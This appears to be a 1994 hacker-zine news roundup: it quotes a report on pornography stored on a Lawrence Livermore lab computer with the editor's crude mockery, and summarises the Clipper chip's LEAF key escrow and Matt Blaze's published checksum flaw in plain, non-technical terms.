|||
|
One of the nation's three nuclear weapons labs has confirmed that
|
|||
|
computer hackers were using its computers to store and distribute
|
|||
|
hard-core pornography.
|
|||
|
|
|||
|
The offending computer, which was shut down after a Los Angeles Times
|
|||
|
reporter investigating Internet hacking alerted lab officials, contained
|
|||
|
more than 1,000 pornographic images. It was believed to be the largest
|
|||
|
cache of illegal hardcore pornography ever found on a computer network.
|
|||
|
|
|||
|
At Lawrence Livermore, officials said Monday that they believed at least
|
|||
|
one lab employee was involved in the pornography ring, along with an
|
|||
|
undetermined number of outside collaborators.
|
|||
|
|
|||
|
[Uh, let me see if I can give this one a go:
|
|||
|
|
|||
|
A horny lab technician at LLNL.GOV uudecoded gifs for days on end
|
|||
|
from a.b.p.e. After putting them up on an FSP site, a nosey schlock
|
|||
|
reporter blew the whistle, and wrote up a big "hacker-scare" article.
|
|||
|
|
|||
|
The top-notch CIAC team kicked the horn-dog out the door, and began
|
|||
|
frantically scouring the big Sun network at LLNL for other breaches,
|
|||
|
all the while scratching their heads at how to block UDP-based apps
|
|||
|
like FSP at their firewall. MPEGs at 11.
|
|||
|
|
|||
|
How does shit like this get printed????]
|
|||
|
|
|||
|
------------------------------------------------------------------------------
|
|||
|
|
|||
|
Clipper Flaw May Thwart Fed Effort June 6, 1994
|
|||
|
by Aaron Zitner (Boston Globe)
|
|||
|
|
|||
|
Patents, Technical Snares May Trip Up the 'Clipper' June 6, 1994
|
|||
|
by Sharon Fisher (Communications Week) (Page 1)
|
|||
|
|
|||
|
[Clipper, Flipper, Slipper. It's all a big mess, and has obsoleted
|
|||
|
itself. But, let's sum up the big news:
|
|||
|
|
|||
|
How the Clipper technology is SUPPOSED to work
|
|||
|
|
|||
|
1) Before an encoded message can be sent, a clipper computer chip
|
|||
|
assigns and tests a scrambled group of numbers called a LEAF, for
|
|||
|
Law Enforcement Access Field. The LEAF includes the chip's serial
|
|||
|
number, a "session key" number that locks the message and a "checksum"
|
|||
|
number that verifies the validity of the session key.
|
|||
|
|
|||
|
2) With a warrant to wiretap, a law-enforcement agency like the FBI
|
|||
|
could record the message and identify the serial number of a Clipper
|
|||
|
chip. It would then retrieve from custodial agencies the two halves of
|
|||
|
that chip's decoding key.
|
|||
|
|
|||
|
3) Using both halves of the decoding key, the FBI would be able to
|
|||
|
unscramble the session key number, thus unlocking the messages or data
|
|||
|
that had been protected.
|
|||
|
|
|||
|
How the Clipper technology is FLAWED (YAY, Matt Blaze!)
|
|||
|
|
|||
|
1) Taking advantage of design imperfections, people trying to defeat
|
|||
|
the system could replace the LEAF until it erroneously passed the
|
|||
|
"checksum" verification, despite an invalid session-key number.
|
|||
|
|
|||
|
2) The FBI would still be able to retrieve a decoding key, but it would
|
|||
|
prove useless.
|
|||
|
|
|||
|
3) Because the decoding key would not be able to unscramble the invalid
|
|||
|
session key, the message would remain locked.]
|